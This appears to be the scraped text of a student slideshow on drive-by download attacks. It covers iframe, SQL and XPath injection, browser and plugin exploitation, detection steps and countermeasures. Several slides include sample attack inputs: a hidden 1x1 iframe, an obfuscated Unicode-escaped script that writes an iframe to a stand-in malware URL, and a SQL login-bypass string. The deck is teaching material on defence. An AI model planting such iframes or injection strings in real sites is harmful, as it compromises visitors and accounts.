Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Drive by downloads-cns


Published on

Published in: Technology
  • Be the first to comment

Drive by downloads-cns

  1. 1. Drive-By DownloadsPresenter: Darakhshan NazTeacher: Professor Dr. Muhammad Mubashir Khan04.05.20131
  2. 2. Agenda Introduction Mechanisms of Drive-by Download General Detection Approach Security Measures Assessment & Conclusion2
  3. 3. What is Drive-by Download? A technique that involves◦ Intended downloads without understanding consequenes E.g. Executables◦ Unintended downloads E.g. Virus, spyware Can happen by:◦ Visiting a website◦ Viewing an email message Installs malicious program, termed as Malwares◦ Through Malwares, attacker gets full or partial control ofvictim‘s system3
  4. 4. 4(2) Read emailContains awebsite link(3) Attractuser‘s interestUser ClickWebsite hasmany links(5) Surf every sitebut getting bored (nointerest develop)Close websiteUserAttacker(6) Sends usera spoofed EmailUser‘s browser(7) Attacker sends malicious code and exploit vulnerability(8) Malicious codecreates connectionbetween user andattacker(9) Download and installits backdoor Program(10) Steal all user‘s important files andmake him compromised over networkExample - ScenarioDrive – By Download !Source of Concept : Report- Defence against Drive-by Download by National Security Agency USUser is completelyunaware of attack(4) Go to website(1) Open Browser
  5. 5. Purpose of Drive-by Download• Provide gateway to botnets.• Take advantages of vulnerabilities.• Steal personal or confidential information of user.• Leads or redirects user to other malicious websitesand make him compromised.5
  6. 6. Mechanisms of Drive-by Download6Basic Concept of Drive-by Download Attack (Source: [1])1 243InjectionExploitation
  7. 7. Injection What is Injection :◦ The act of entering data into application by bypassingsecurity controls and change its behaviour in unexpectedway. Reason of Injection :◦ Existance of vulnerabilities. Drive-by Download initates by the injection ofmalicious code in database, application or server. Ways of Malicious code injection:◦ Injection through iFrames◦ SQL Injection◦ XPATH Injection7
  8. 8. How and where to Inject ?8Source :• SQL Injection• Xpath InjectionInjection through iFramesMalware placeddirectly onWebserver
  9. 9. Injection through iFrames The most basic form of injected code is a maliciousiFrame such as: Example:<div style=visibility: hidden; position: absolute: 1; top:1><iframe id=IFRAME name=IFRAMEsrc= no width=1 height=1 vspace=0hspace=0 frameborder=0></iframe></div>9This iFrame is present in theHTML of a requested webpageContent from thissource render in aninvisible 1 pixel x 1pixel window.Sometimes, iFrames present in encoded form that seems normal.The process of encoding is known as "obfuscation“.
  10. 10. Obfuscation The process of disguising code through encoding. The previous iFrame can be converted to a JavaScriptUnicode string using any encoding tool. Encoding tool: On browsing of injected page, the JavaScriptdynamically generates an iframe. This causes malicious content from a website controlledby an attacker to execute inside the requested webpage.10
  11. 11. Obfuscation Obfuscated form of iFrame is :<scripttype="text/javascript">document.write(u003Cu0064u0069u0076u0020u0073u0074u0079u006Cu0065u003Du0076u0069u0073u0069u0062u0069u006Cu0069u0074u0079u003Au0020u0068u0069u0064u0064u0065u006Eu003Bu0020u0070u006Fu0073u0069u0074u0069u006Fu006Eu003Au0020u0061u0062u0073u006Fu006Cu0075u0074u0065u003Au0020u0031u003Bu0020u0074u006Fu0070u003Au0031u003Eu0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u0020u003Cu0069u0066u0072u0061u006Du0065u0020u0069u0064u003Du0049u0046u0052u0041u004Du0045u0020u006Eu0061u006Du0065u003Du0049u0046u0052u0041u004Du0045u000Du0020u0020u0020u0073u0072u0063u003Du0020u0068u0074u0074u0070u003Au002Fu002Fu0077u0077u0077u002Eu0065u0078u0061u006Du0070u006Cu0065u002Eu0063u006Fu006Du002Fu0070u0061u0067u0065u005Fu0077u0069u0074u0068u005Fu006Du0061u006Cu0077u0061u0072u0065u002Eu0068u0074u006Du000Du0020u0020u0020u0073u0063u0072u006Fu006Cu006Cu0069u006Eu0067u003Du0020u006Eu006Fu0020u0077u0069u0064u0074u0068u003Du0031u0020u0068u0065u0069u0067u0068u0074u003Du0031u0020u0076u0073u0070u0061u0063u0065u003Du0030u000Du0020u0020u0020u0020u0068u0073u0070u0061u0063u0065u003Du0030u0020u0020u0066u0072u0061u006Du0065u0062u006Fu0072u0064u0065u0072u003Du0030u003Eu000Du003Cu002Fu0069u0066u0072u0061u006Du0065u003Eu000Du003Cu002Fu0064u0069u0076u003Eu000Du000D);</script>11
  12. 12. SQL Injection Bypass the authentication process. Provide access of data to malicious user or attacker. Example : In any userForm page if we enterUsername: or‘1‘=‘1 and Password: or‘1‘=‘1then webpage will execute this query formSELECT * FROM UsersWHERE Username=`1 OR `1 = `1‘AND Password = `1 OR `1 = `1‘Parameters have alwayslogical true conditionAuthentication process is validated and attacker can get access toany account in database.12
  13. 13. XPATH Injection Almost similar to SQL Injection. Now “target“ is XML Document. Insecurity caused by the injection of XPATH queryor conditions through webpage. Example :◦ If any user has an account in any site with Username=Johnand Password = test123, then logically he will see hisaccount only.• If same user enters his username like John or 1 = 1 withsame password then system will authenticate him andshow the entire XML document to him.13
  14. 14. Mechanism of Drive-by Download14Basic Concept of Drive-by Download Attack (Source: [1])1 243InjectionExploitation
  15. 15. Exploitation What is Exploitation :◦ The act by an attacker to perform activities on victim‘s systemon his own wish after getting full or partial control. Reason of Exploitation:◦ Ignore the updating of installed applications.◦ According to Secunia PSI, about 95.46% users have one ormore insecure applications.◦ Newer version may correct one or more vulnerabilities in theinstalled application. Vulnerabilities that are mostly exploited :◦ Browser Vulnerability.◦ Plugin Vulnerability.◦ File Format Vulnerability.15
  16. 16. Types of Vulnerabilities Browser Vulnerability◦ Attacker injects malicious code into user‘s browser andchanges its setting without his knowledge. Plugin Vulnerability◦ Plugin is provided by third parties that can be vulnerable;may lead to buffer overflows, memory corruption issuesand pointer overwrites. File Format Vulnerability◦ Attackers attach malware to Word, Excel or PDF files,distributed through email or websites. Exploit will occurwhen editing program opens them.16
  17. 17. General Detection Approach Javascript-script based malwares seems difficult todetect and analyze. Requires a comprehensive approach to detect both rootcause and dynamic behaviour. Specialized Detection Methods:◦ CUJO[2] Static + Dynamic analysis of Javascript Detection through machine learning◦ ARROW[8]. Create Regular Expression Signatures for servers of MDN. Evaluate their effectiveness.Here the generalized detection approach will bediscussed which is the basic idea to detect.17
  18. 18. Step1: Analysis of JS Redirection For an effective detection approach, analysis ofJavaScript is mandatory.• User is victimized in two ways:• Either he may directly expose to vulnerable site.• Or an attacker reaches to him through a series ofredirections. Two approaches can be taken to investigateredirections.◦ Implementing some settings into JavaScript code (e.g:document.location).◦ Taking Browser‘s history.18
  19. 19. Step2: JavaScript Deobfuscation Most of the malicious JavaScript is in obfuscated(encoded) form. Deobfuscation (conversion from complex form tosimple form) can help to identify malicious code. It is possible through manually or any automatedtool. Automated Tools : e.g:◦ Development Tool in Google Chrome.◦ Microsoft Script Debugger or Editor.19
  20. 20. Step3: Detection of Memory Corruption Most attacks corrupt the memory. Attacker tries to enter into browser and run hisshellcode.◦ A shellcode is a small code through which attacker getscontrol of victim‘s system.• Attacker then uses JavaScript to allocate large numberof strings for the shellcode.• These strings are not the part of real code but formemory allocation by the attacker.• Detection of these strings can give the indication ofshellcode. 20
  21. 21. Contd. Detection of these strings can be done through twoways:◦ Controlling and maintaining of string variables wheneverthey are created.◦ For automated detection, libemu library is used. It searches from each character and when it finds a sequenceof valid instructions, it reports shellcode.21
  22. 22. Step4: Investigation of Exploitation Exploitation is last step of Drive-by Downloadattack that take advantage of vulnerabilities. It can be detected through two ways :◦ Analysis of behaviours of Browsers and Plug-ins◦ Monitoring of string passing as parameters and methodcalls. Usually long strings are used in exploits and certainmethods are called in malware downloading.22
  23. 23. Security Measures Updation of softwares. Installation of web-filtering softwares. Implementation of BLADE(Block All Drive-byDownload Exploits). Proper management by Network Administrators. Users should be careful while visiting sitesspecially entertainment and social sites as theymay have Adversaries. Usage of reputed search engines likeGoogle, Microsoft, Yahoo, AVG or Bing. Usage of Virtual Machine for Web Browsing.23
  24. 24. The Good Automated techniques (compiler or library) ofdeobfuscation is really helpful for the identification ofmalicious JavaScript. Detection should be focussed on central points.◦ Evilseed[11] provides a crawling approach focussing oncentral points of Malware. Machine Learning can provide light weight Javascriptanalysis, fast detection mechanisms and handling ofvulnerabilities in runtime. Proper input validations can reduce SQL and XPATHinjection.24
  25. 25. The Bad Can easily happen but very hard to overcome. Possibilities of attack are rapidly increasing butvalidity of detection approaches is not possibleevery time. Defensive approach is better to fight against theseattacks because of two reasons :◦ Intense Dynamic behaviour.◦ Complex and time consuming detection approaches.25
  26. 26. The Ugly Mostly show unexpected behaviour. Due to diversity of different ways of attack, it hashigh ratio of victims and it is difficult to design adetection approach that covers all possibilities. Not any computing device seems to be safe fromDrive-by Download. As Drive-by Download attack is increasingenormously, perhaps in near future, hard drives orportable device vulnerabilities may also exist.26
  27. 27. Thanks for your attention27
  28. 28. References(1)[1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsersagainst Drive-by Downloads: Mitigating Heap-Spraying CodeInjection Attacks (2009).[2] Rieck, K., Krueger, T., Dewald, A.: CUJO-Ecient Detectionand Prevention of Drive-by Download Attacks, TecnischeUniversitaet Berlin.[3] Stone-Gross, B., Cova M. , Kruegel, C. , Vigna, G.: Peeringthrough the iFrame University of California, University ofBirmingham.[4] Westervelt, R.: Kaspersky website hacked (February 2009).[5] Cova, M. , Kruegel, C., Vigna G.: Detection and Analysis ofDrive-by-Download Attacks andMalicious Javascript CodeUniversity of California, Santa Barbara From ACM digital library.[6] Interesting statistics from the Secunia PSI (January 2008)
  29. 29. References(2)[7] Luy, L., Yegneswaranz, V., Porrasz, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware InfectionsCollege of Computing, Georgia Institute of Technology, SRIInternational From ACM digital library.[8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W. : ARROW:Generating Signatures to Detect Drive-By Downloads GeorgiaInstitute of Technology, Microsoft Bing, Microsoft Research[9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in WebBrowsers Indian Institute of Technology, Guwahati, India.[10] Provos, N., Mavrommatis, P., Moheeb, A. R., Monrose, F.:All your Iframes point to us Google Inc., Johns HopkinsUniversity.[11]Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P., M., Kruegel, C., Vigna,G.:EVILSEED: A Guided Approach to FindingMaliciousWeb Pages, 2012 IEEE Symposium on Security andPrivacy 29